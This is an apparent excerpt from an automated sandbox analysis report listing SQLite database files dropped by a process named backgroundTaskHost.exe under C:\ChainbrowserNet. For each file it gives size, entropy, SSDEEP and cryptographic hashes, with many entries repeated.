                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5712781801655107
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                          Category:dropped
                                                                                          Size (bytes):28672
                                                                                          Entropy (8bit):2.5793180405395284
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):49152
                                                                                          Entropy (8bit):0.8180424350137764
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                          Category:dropped
                                                                                          Size (bytes):28672
                                                                                          Entropy (8bit):2.5793180405395284
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5712781801655107
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5707520969659783
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                          Category:dropped
                                                                                          Size (bytes):28672
                                                                                          Entropy (8bit):2.5793180405395284
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                          Category:dropped
                                                                                          Size (bytes):28672
                                                                                          Entropy (8bit):2.5793180405395284
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5707520969659783
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                          Category:dropped
                                                                                          Size (bytes):28672
                                                                                          Entropy (8bit):2.5793180405395284
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):98304
                                                                                          Entropy (8bit):0.08235737944063153
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                          Category:dropped
                                                                                          Size (bytes):28672
                                                                                          Entropy (8bit):2.5793180405395284
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
